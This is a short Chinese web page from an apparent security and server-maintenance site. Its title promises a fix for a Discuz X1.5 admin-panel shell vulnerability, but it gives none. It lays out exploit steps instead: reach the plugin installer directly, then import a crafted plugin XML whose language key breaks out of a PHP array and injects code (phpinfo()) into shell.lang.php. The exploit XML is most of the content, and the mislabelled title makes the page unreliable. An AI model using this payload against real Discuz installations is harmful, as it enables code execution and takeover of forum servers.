DISCUZ X1.5后台漏洞shell的修复方案_安全漏洞聚焦_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

DISCUZ X1.5后台漏洞shell的修复方案

作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0

本篇关键词:后台漏洞DZDISCUZ
黑客防线网安网讯:先看下shell.lang.php的文件格式.

先看下shell.lang.php的文件格式.

虽然看不到插件选项,但是可以直接访问/admin.php?frames=yes&action=plugins添加插件
在插件 安装新插件
地址:\data\plugindata\shell.lang.php
必须要有php环境的配合
EXP 保存为 .xml
xml version=”1.0″ encoding=”ISO-8859-1″?>
<root>
<item id=”Title”><![CDATA[Discuz! Plugin]]></item>
<item id=”Version”><![CDATA[7.2]]></item>
<item id=”Time”><![CDATA[2011-03-16 15:57]]></item>
<item id=”From”><![CDATA[Discuz! Board (</item">http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item>
<item id=”Data”>
<item id=”plugin”>
<item id=”available”><![CDATA[0]]></item>
<item id=”adminid”><![CDATA[0]]></item>
<item id=”name”><![CDATA[www]]></item>
<item id=”identifier”><![CDATA[shell]]></item>
<item id=”description”><![CDATA[]]></item>
<item id=”datatables”><![CDATA[]]></item>
<item id=”directory”><![CDATA[]]></item>
<item id=”copyright”><![CDATA[]]></item>
<item id=”modules”><![CDATA[a:0:{}]]></item>
<item id=”version”><![CDATA[]]></item>
</item>
<item id=”version”><![CDATA[7.2]]></item>
<item id=”language”>
<item id=”scriptlang”>
<item id=”a’”><![CDATA[=>1);phpinfo();?>]]></item>
</item>
</item>
</item>
</root>

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-5144-1.html
网站维护教程更新时间:2011-07-24 01:18:03  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer